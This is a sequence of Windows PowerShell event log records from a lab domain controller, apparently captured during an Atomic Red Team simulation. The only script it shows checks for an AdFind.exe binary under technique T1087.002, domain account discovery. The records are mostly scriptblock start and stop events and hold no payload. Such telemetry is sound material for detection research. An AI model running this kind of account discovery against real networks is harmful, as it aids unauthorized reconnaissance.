TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478422
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{if (Test-Path C:\AtomicRedTeam\atomics\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}}

ScriptBlock ID: f3afa0b4-27b1-4ed8-a9bf-0407783065fd
Path:
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478421
Keywords=None
Message=Started invocation of ScriptBlock ID: 3c5bb87d-08bd-4440-b210-b4cc8d4e6dc3
Runspace ID: 8cda7be1-22da-4435-a072-9b50e2842368
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478420
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {if (Test-Path C:\AtomicRedTeam\atomics\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}}

ScriptBlock ID: 3c5bb87d-08bd-4440-b210-b4cc8d4e6dc3
Path:
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478419
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478418
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 5184 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478417
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478416
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478415
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478414
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478413
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478412
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478411
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478410
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478409
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478408
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478407
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478406
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478405
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478404
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478403
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478402
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478401
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478400
Keywords=None
Message=Started invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478399
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478398
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478397
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478396
Keywords=None
Message=Completed invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478395
Keywords=None
Message=Started invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478394
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478393
Keywords=None
Message=Started invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478392
Keywords=None
Message=Completed invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478391
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478390
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478389
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478388
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478387
Keywords=None
Message=Started invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478386
Keywords=None
Message=Started invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478385
Keywords=None
Message=Completed invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478384
Keywords=None
Message=Started invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478383
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478382
Keywords=None
Message=Completed invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478381
Keywords=None
Message=Started invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478380
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478379
Keywords=None
Message=Started invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478378
Keywords=None
Message=Completed invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478377
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478376
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478375
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478374
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478373
Keywords=None
Message=Started invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478372
Keywords=None
Message=Started invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478371
Keywords=None
Message=Completed invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478370
Keywords=None
Message=Started invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478369
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478368
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478367
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
